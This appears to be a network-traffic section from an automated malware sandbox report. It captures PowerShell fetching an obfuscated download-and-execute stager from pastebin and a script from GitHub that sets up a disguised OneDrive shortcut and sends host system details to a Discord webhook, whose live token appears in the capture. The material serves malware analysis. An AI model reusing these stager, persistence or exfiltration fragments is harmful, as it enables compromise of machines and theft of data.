                                                                                                2024-10-15 13:52:32 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:52:33 UTC902INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 7508
                                                                                                Cache-Control: max-age=300
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:52:32 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120086-DFW
                                                                                                X-Cache: MISS
                                                                                                X-Cache-Hits: 0
                                                                                                X-Timer: S1729000353.911532,VS0,VE37
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: 6583920dd06407653ae8e84b5dbfb80d9fd674a6
                                                                                                Expires: Tue, 15 Oct 2024 13:57:32 GMT
                                                                                                Source-Age: 0
                                                                                                2024-10-15 13:52:33 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                                2024-10-15 13:52:33 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                                2024-10-15 13:52:33 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                                2024-10-15 13:52:33 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                                2024-10-15 13:52:33 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                                2024-10-15 13:52:33 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.549764172.67.19.244431196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:52:37 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: pastebin.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:52:37 UTC395INHTTP/1.1 200 OK
                                                                                                Date: Tue, 15 Oct 2024 13:52:37 GMT
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                x-frame-options: DENY
                                                                                                x-content-type-options: nosniff
                                                                                                x-xss-protection: 1;mode=block
                                                                                                cache-control: public, max-age=1801
                                                                                                CF-Cache-Status: HIT
                                                                                                Age: 7
                                                                                                Last-Modified: Tue, 15 Oct 2024 13:52:30 GMT
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 8d304a697faba921-DFW
                                                                                                2024-10-15 13:52:37 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                                Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                                2024-10-15 13:52:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.549771185.199.108.1334431196C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:52:38 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Host: raw.githubusercontent.com
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:52:38 UTC900INHTTP/1.1 200 OK
                                                                                                Connection: close
                                                                                                Content-Length: 7508
                                                                                                Cache-Control: max-age=300
                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                ETag: "085e232a893b000bbbc5e224886d89e33401e064c6e72827d0c19fb0195af2ea"
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-Content-Type-Options: nosniff
                                                                                                X-Frame-Options: deny
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                X-GitHub-Request-Id: B26C:32E28B:21F9020:25C3557:670E73A0
                                                                                                Accept-Ranges: bytes
                                                                                                Date: Tue, 15 Oct 2024 13:52:38 GMT
                                                                                                Via: 1.1 varnish
                                                                                                X-Served-By: cache-dfw-kdal2120129-DFW
                                                                                                X-Cache: HIT
                                                                                                X-Cache-Hits: 1
                                                                                                X-Timer: S1729000359.765403,VS0,VE1
                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                X-Fastly-Request-ID: 6b33532d7d459b2166297286108e26e1669b35b8
                                                                                                Expires: Tue, 15 Oct 2024 13:57:38 GMT
                                                                                                Source-Age: 6
                                                                                                2024-10-15 13:52:38 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                                Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                                2024-10-15 13:52:38 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                                Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                                2024-10-15 13:52:38 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                                Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                                2024-10-15 13:52:38 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                                Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                                2024-10-15 13:52:38 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                                Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                                2024-10-15 13:52:38 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                                Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.549812162.159.138.2324435424C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-10-15 13:52:46 UTC311OUTPOST /api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_efW5EguYXiAyCvsMrX7i2 HTTP/1.1
                                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                Content-Type: application/json
                                                                                                Host: discord.com
                                                                                                Content-Length: 300
                                                                                                Connection: Keep-Alive
                                                                                                2024-10-15 13:52:46 UTC300OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 5c 6e 2a 2a 61 6c 66 6f 6e 73 2a 2a 20 73 79 73 74 65 6d 20 6f 6e 6c 69 6e 65 5c 6e 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 53 5f 37 44 43 38 42 47 48 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 5c 6e 2a 2a 4f 53 3a 2a 2a 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 6e 2a 2a 55 41 43 3a 2a 2a 20 4d 61 78 69 6d 75 6d 20 55 41 43 20
                                                                                                Data Ascii: { "content": "================================\n**user** system online\n\n**GPU:** S_7DC8BGH\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4\n**OS:** Windows 10 Pro\n**UAC:** Maximum UAC
                                                                                                2024-10-15 13:52:46 UTC1350INHTTP/1.1 204 No Content
                                                                                                Date: Tue, 15 Oct 2024 13:52:46 GMT
                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                Connection: close
                                                                                                set-cookie: __dcfduid=c203dffa8afc11ef9e99badef12010c9; Expires=Sun, 14-Oct-2029 13:52:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                x-ratelimit-limit: 5
                                                                                                x-ratelimit-remaining: 4
                                                                                                x-ratelimit-reset: 1729000367
                                                                                                x-ratelimit-reset-after: 1
                                                                                                via: 1.1 google
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V0ODjtRchfZS0l1lWSG2wq%2FdpL4flGg1wG1PF2IFZ5dNnrrjlQEhX9fnwVPmQgBFKybrkiiLy3P6jPzIKkrYPHD6LXqMT0U95K2pl9eLOfKVXMr8DtcmYndbeadM"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                Set-Cookie: __sdcfduid=c203dffa8afc11ef9e99badef12010c98561f4e4e2e1ded5d97cfe8873c2feacaa0c9682def86b5a4d7fef8ff874124b; Expires=Sun, 14-Oct-2029 13:52:46 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                Set-Cookie: __cfruid=8935f3c3af4f042122a7df5dc98dcd040115b26e-1729000366; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
